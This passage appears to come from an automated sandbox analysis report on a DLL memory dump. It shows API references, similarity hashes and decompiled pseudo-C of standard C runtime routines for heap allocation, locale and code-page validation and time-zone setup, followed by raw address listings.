Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocErrorFreeLast_free
String ID:
API String ID: 3091179305-0
Opcode ID: c1991f024c2fcfd74ca2197f4b2dcfe4b49e5383834522ee5230ad89320bec15
Instruction ID: 8dccd6e1a44d82d17f1f08e0d35316dc5d3be313b546dc155e983aa13795b004
Opcode Fuzzy Hash: c1991f024c2fcfd74ca2197f4b2dcfe4b49e5383834522ee5230ad89320bec15
Instruction Fuzzy Hash: C3F08CB6A08605AFC300DF68D841B9AB7F4EB48724F21416AEA18E7340EB71A9108BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1F26D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: af7a86895720ab0afd0f42de08a061351e3d68322c200ad388ff30fa02218c54
Instruction ID: 7047d5717f3d16d466f9e2d8ff96f9cb36f2e7fef4ebe4e00f95e189fb6ada04
Opcode Fuzzy Hash: af7a86895720ab0afd0f42de08a061351e3d68322c200ad388ff30fa02218c54
Instruction Fuzzy Hash: 90E0E57B74C1225AEB3116A59C00BAA3B98BF833B8F3605159D15A62C0DF68C840C1E0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD8BFE, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDD8C05

Part of subcall function 6DDD4A80: __EH_prolog3.LIBCMT ref: 6DDD4A87
Part of subcall function 6DDD4A80: std::_Lockit::_Lockit.LIBCPMT ref: 6DDD4A91
Part of subcall function 6DDD4A80: int.LIBCPMT ref: 6DDD4AA8
Part of subcall function 6DDD4A80: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD4AF8

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1538362411-0
Opcode ID: 1cda6e636d255a7bf84f11292200b263d8435f14616e6208cf0b6078d57215ad
Instruction ID: 0dd6e9d7f24cb9ae0b84a8cfa703db19b41fbf79a2176969047b48fe37334cfb
Opcode Fuzzy Hash: 1cda6e636d255a7bf84f11292200b263d8435f14616e6208cf0b6078d57215ad
Instruction Fuzzy Hash: 28F03079A05119AFDF44FB60C444ABD7775FF54209F630009EA026B280DF759A02CBB6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6DE2E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6DE2E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6de9506c; // 0x20895150
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6de1e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6DE1D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6DE1D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6de1e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6de42f04; // 0x17
					E6DE2E68F(0, " )�mU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6de1e03b
					E6DE2E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6de1e03b
						E6DE2E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6de1e03b
						E6DE2E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6de42dec; // 0x41
						_t77 = E6DE2E68F(_t99, "t!�mE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6DE2E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6DE245D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6DDEF8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6DE245D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6DE35124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6DE2E112(_t92, _t99,  &_v20);
						} else {
							E6DE2E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x6de2e6f4
0x6de2e6fb
0x6de2e702
0x6de2e702
0x6de2e706
0x6de2e70a
0x6de2e718
0x6de2e71d
0x6de2e71e
0x6de2e71f
0x6de2e720
0x6de2e725
0x6de2e728
0x6de2e72a
0x6de2e730
0x6de2e736
0x6de2e739
0x6de2e73b
0x6de2e73e
0x6de2e742
0x6de2e749
0x6de2e756
0x6de2e75b
0x6de2e75e
0x6de2e761
0x6de2e761
0x6de2e763
0x6de2e766
0x6de2e76a
0x6de2e7da
0x6de2e7dc
0x6de2e7de
0x6de2e7f1
0x6de2e7f1
0x6de2e7f8
0x6de2e7fe
0x6de2e801
0x00000000
0x6de2e801
0x6de2e7e0
0x6de2e7e3
0x00000000
0x00000000
0x6de2e7e5
0x6de2e7e9
0x6de2e7ee
0x00000000
0x6de2e771
0x6de2e771
0x6de2e775
0x6de2e787
0x6de2e78b
0x6de2e77c
0x6de2e77c
0x6de2e780
0x6de2e780
0x6de2e794
0x6de2e795
0x6de2e81f
0x6de2e81f
0x00000000
0x6de2e79b
0x6de2e79b
0x6de2e7aa
0x6de2e7af
0x6de2e7b4
0x6de2e804
0x6de2e804
0x6de2e804
0x6de2e806
0x6de2e80a
0x6de2e821
0x6de2e82d
0x6de2e837
0x6de2e83a
0x6de2e83b
0x6de2e83d
0x00000000
0x00000000
0x6de2e83f
0x6de2e845
0x00000000
0x00000000
0x6de2e847
0x6de2e84d
0x00000000
0x00000000
0x6de2e853
0x6de2e859
0x6de2e85b
0x00000000
0x00000000
0x6de2e862
0x6de2e868
0x6de2e86a
0x00000000
0x00000000
0x6de2e86c
0x6de2e86f
0x6de2e871
0x6de2e873
0x6de2e873
0x6de2e884
0x6de2e889
0x6de2e88b
0x6de2e8eb
0x6de2e80e
0x6de2e81e
0x6de2e81e
0x6de2e89a
0x6de2e8aa
0x6de2e8b0
0x6de2e8b2
0x00000000
0x00000000
0x6de2e8c9
0x6de2e8cf
0x6de2e8d1
0x00000000
0x00000000
0x6de2e8e3
0x00000000
0x6de2e8e8
0x6de2e80c
0x00000000
0x6de2e80c
0x6de2e7b6
0x6de2e7b8
0x6de2e7bc
0x6de2e7d2
0x6de2e7c3
0x6de2e7c7
0x6de2e7c7
0x6de2e7d7
0x00000000
0x6de2e7d7
0x6de2e795

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D65E
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6DE2E7F8
IsValidCodePage.KERNEL32(00000000), ref: 6DE2E853
IsValidLocale.KERNEL32(?,00000001), ref: 6DE2E862
GetLocaleInfoW.KERNEL32(?,00001001,;m,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6DE2E8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6DE2E8C9

Strings

)mU, xrefs: 6DE2E751
;m, xrefs: 6DE2E821, 6DE2E7C3, 6DE2E7CE
t!mE, xrefs: 6DE2E7A5
;m, xrefs: 6DE2E715, 6DE2E725, 6DE2E7E5, 6DE2E787, 6DE2E77C, 6DE2E77F, 6DE2E78A, 6DE2E7E8
;m, xrefs: 6DE2E702, 6DE2E8A1

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )mU$;m$;m$;m$t!mE
API String ID: 745075371-469580627
Opcode ID: 58661702ba643eda020379749338115409e1dfcd7831f36db701fc7a144c78de
Instruction ID: 26e71a0ce192d37410f522384ce4e92545f2799d156fb9948d837542c5888052
Opcode Fuzzy Hash: 58661702ba643eda020379749338115409e1dfcd7831f36db701fc7a144c78de
Instruction Fuzzy Hash: 54517572900A2AABEF14DFB5CC44ABE77B8FF45B04F254029E664EB240DF709945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6DE2DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6DE1D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6DE2DD27(" )�mU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6DE2D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6DE2D775();
					} else {
						E6DE2D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6DE2DD27("t!�mE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6DE2D775();
							} else {
								E6DE2D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6DE2DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6de1e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6DE2D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6DE12188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6de9506c; // 0x20895150
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6DE1D5FF(_t89, _t100, _t116);
								_t122 =  *(E6DE1D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6DE2E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6DE2806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6DE2E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6DDEF8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6DE24323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6DE24323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6DE37BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6DE24323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6DE37BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6DE35124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

0x6de2dd96
0x6de2dd9b
0x6de2dd9c
0x6de2dd9d
0x6de2dd9f
0x6de2dda0
0x6de2dda5
0x6de2dda8
0x6de2ddaa
0x6de2ddad
0x6de2ddad
0x6de2ddb0
0x6de2ddb0
0x6de2ddb6
0x6de2ddb9
0x6de2ddbc
0x6de2ddbc
0x6de2ddbf
0x6de2ddc2
0x6de2ddc8
0x6de2ddca
0x6de2ddcf
0x6de2ddd9
0x6de2ddde
0x6de2dde1
0x6de2dde1
0x6de2dde5
0x6de2dde9
0x6de2de32
0x00000000
0x6de2ddeb
0x6de2ddf0
0x6de2ddf9
0x6de2ddf2
0x6de2ddf2
0x6de2ddf2
0x6de2de00
0x6de2de04
0x6de2de0e
0x6de2de13
0x6de2de18
0x6de2de1e
0x6de2de22
0x6de2de2b
0x6de2de24
0x6de2de24
0x6de2de24
0x6de2de37
0x6de2de37
0x6de2de37
0x6de2de18
0x6de2de04
0x6de2de3d
0x6de2df4f
0x6de2df4f
0x6de2df4f
0x00000000
0x6de2de43
0x6de2de50
0x6de2de56
0x00000000
0x6de2de86
0x6de2de86
0x6de2de8b
0x6de2de8d
0x6de2de8d
0x6de2de8f
0x6de2de8f
0x6de2de94
0x6de2df4a
0x6de2df4c
0x00000000
0x6de2de9a
0x6de2de9a
0x6de2de9d
0x6de2dea5
0x6de2dea8
0x6de2deab
0x6de2deab
0x6de2deae
0x6de2deb1
0x6de2deb9
0x6de2debe
0x6de2dec5
0x6de2deca
0x6de2decd
0x6de2decf
0x6de2df5a
0x6de2df5b
0x6de2df5c
0x6de2df5d
0x6de2df5e
0x6de2df5f
0x6de2df64
0x6de2df68
0x6de2df70
0x6de2df77
0x6de2df7a
0x6de2df7b
0x6de2df7f
0x6de2df85
0x6de2df8d
0x6de2df9c
0x6de2dfa8
0x6de2dfb9
0x6de2dfbf
0x6de2dfc1
0x6de2dfd2
0x6de2dfd9
0x6de2dfdb
0x6de2dfde
0x6de2dfe4
0x6de2dfe6
0x6de2dfe8
0x6de2dfe8
0x6de2dfeb
0x6de2dfee
0x6de2dfee
0x6de2dfe6
0x6de2dff8
0x6de2dfc3
0x6de2dfc3
0x6de2dfc5
0x6de2dfff
0x6de2e000
0x6de2e00b
0x6de2ded5
0x6de2dede
0x6de2dee3
0x6de2dee5
0x00000000
0x6de2dee7
0x6de2dee9
0x6de2df03
0x00000000
0x6de2df05
0x6de2df05
0x6de2df08
0x6de2df0e
0x6de2df11
0x6de2df21
0x6de2df34
0x00000000
0x00000000
0x00000000
0x00000000
0x6de2df13
0x6de2df13
0x6de2df16
0x6de2df1c
0x6de2df1d
0x6de2df1f
0x6de2df36
0x6de2df42
0x00000000
0x00000000
0x00000000
0x00000000
0x6de2df1f
0x6de2df11
0x6de2df03
0x6de2df51
0x6de2df57
0x6de2df57
0x6de2decf
0x6de2de94
0x6de2de56

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6DE1E042,?,?,?,?,6DE1DA1E,?,00000004), ref: 6DE2DE78
_wcschr.LIBVCRUNTIME ref: 6DE2DF08
_wcschr.LIBVCRUNTIME ref: 6DE2DF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,Bm,00000000,?), ref: 6DE2DFB9

Strings

)mU, xrefs: 6DE2DDD4
Bm, xrefs: 6DE2DE8F, 6DE2DED7, 6DE2DF7F
t!mE, xrefs: 6DE2DE09

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )mU$Bm$t!mE
API String ID: 4212172061-4093402219
Opcode ID: a8b7fce2440edd47fa963f4898941171e53fa054f4b0256480d0f60490f7f6fa
Instruction ID: fca5fd93ebc67425c94dae02697d5b0b382bef76f01ec8e2ddcbbe6c23e9e401
Opcode Fuzzy Hash: a8b7fce2440edd47fa963f4898941171e53fa054f4b0256480d0f60490f7f6fa
Instruction Fuzzy Hash: 06612939604207AAE7159B34CC85BBA73A8EF85718F22446EEB18D7280FF74E541C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 6DE28951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DE28951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6DE2822B();
				_t1 =  &_v8; // 0x6de42130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6DE28289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6DE12188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6de9506c; // 0x20895150
					_v56 = _t38 ^ _t106;
					 *0x6de95384 =  *0x6de95384 | 0xffffffff;
					 *0x6de95378 =  *0x6de95378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6de97a10 = 0;
					_t42 = E6DE21216(0x6de42130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6de42130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6DE1F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6DE21216(0x6de42130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6de42130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6DE1CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6DE1CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6DE28951(0x6de42130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6DE2877C(0x6de42130, _t90, __eflags);
						}
					}
					E6DE1CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6DDEF8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6DE28231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6DE2825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6DE1CBD3( *0x6de97a08);
							 *0x6de97a08 = 0;
							 *_t107 = 0x6de97a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6de97a18 * 0x3c;
								_t88 =  *0x6de97a6c; // 0x0
								_push(__edi);
								 *0x6de97a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6de97a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6de97ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6de97ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6DE13CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6de97a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6de97a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6DE28225()) = _v8;
							 *(E6DE28219()) = _v12;
							_t61 = E6DE2821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x6de28951
0x6de28960
0x6de28964
0x6de28967
0x6de2896b
0x6de2896e
0x6de28971
0x6de28976
0x6de28979
0x6de28aa1
0x6de28aa1
0x6de28aa2
0x6de28aa3
0x6de28aa4
0x6de28aa5
0x6de28aa6
0x6de28aab
0x6de28aaf
0x6de28ab7
0x6de28abe
0x6de28ac1
0x6de28ace
0x6de28ad5
0x6de28ad6
0x6de28add
0x6de28aec
0x6de28af3
0x6de28afb
0x6de28afd
0x6de28b07
0x6de28b0a
0x6de28b17
0x6de28b1a
0x6de28b1c
0x6de28b35
0x6de28b3d
0x6de28b3f
0x6de28b45
0x6de28b4a
0x6de28b41
0x6de28b41
